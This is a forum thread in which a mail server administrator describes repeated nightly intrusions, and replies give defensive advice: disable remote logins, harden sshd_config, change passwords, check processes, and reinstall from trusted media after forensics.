Dear All,
Good Day. I've a mail server with redhat linux,sendmail & openwebmail. It was running good. But from last few days in every night, somebody login to my server by hiding his user name and password. Only I can see his work from bash_histry. Every time he login, he make some folder, download some file from different web site and install it in my server and run it. Most of them are scanning script and some time he deletes my file and folder. I've already allow only my IP block in hosts.allow file for login. But no result. These situations make me very unsafe.

Is any body here to help me to protect my server from him? This is very urgent for me.

Thanking You all again

With regards,

M. Crown

If it's a ssh login, block ssh remote access and use only local console. What means, turn off sshd. If you have more remote login methods, turn them all off. Then start looking into the possible holes. Start from checking user accounts (empty passwords?), then all the services you run.

No matter what, it will probably end with complete reinstall (with data copied to another media, of course).

For references, look into unSpawn's links: http://www.linuxquestions.org/questi...ad.php?t=45261

Sounds like someone's a little lax in their security policies.

Sounds like whoever is getting in is able to use the 'root' account. Start by changing the password to the 'root' account. Make this something not easy to guess. Actually, you should make it something impossible to guess. I would write down random characters, including symbols such as !, $, etc., and then change the password to that. Make it very long (at least 10 characters), and put it in a safe place, then destroy it when (or if) you memorize it.

Next, if you're using telnet to access the system, stop! Anyone can observe what you are doing, including entry of passwords. Use SSH. There is no reason why anyone should need to use Telnet, since there are lots of good SSH clients available, even if you are using Windows ('putty' is a good one, and it's free).

Next, check your sshd_config file. Check the following:
PermitEmptyPasswords no
PermitRootLogin no

NEVER EVER allow someone to directly login as root remotely.

It sounds like someone obviously knows one of your usernames and passwords. At a minimum, you should change the passwords to your user accounts. For extra measure, I would change the usernames as well. Make sure they all have passwords, and they should be passwords that are not easy to guess. Don't be shy about imposing standards on passwords for your users.

Also, make sure they don't have something running on your system that can observe these changes and report these changes to whomever is doing this. You could do all of this and it would all be for not. If you're not sure if something is a legit process, do a 'ps -ef' command and post it here. Someone here should be able to tell if a process if bogus. If something isn't legit, kill it ('kill -9 <processnumber>').

Hope this helps.

If he's able to delete your files, it's likely that he has gained root access (as pointed out above). Because he has gained root, the attacker has the ability to do whatever he/she likes including replacing system binaries with trojaned versions or putting other backdoors on the system that may be extremely difficult to detect. Unless you have some means of detecting *every* single change on the system (such as a tripwire footprint of the system taken before the compromise), then there is *NO* other way you can be sure that the system is secure. Simply changing the root password or shutting off SSH are absolutely not effective means of securing the system. You need to reformat and reinstall.

That being said, you may want to do some forensics on the system to determine how the attacker gained access to the system (e.g through SSH brute force, web application hole, unpatched service, etc). You may want to start by posting the bash_history info as that may help narrow things down, also could you give a list of the services that were run on the system (SSH, apache, PHP, FTp, etc). However in the end you will need to rebuild the server from trusted media.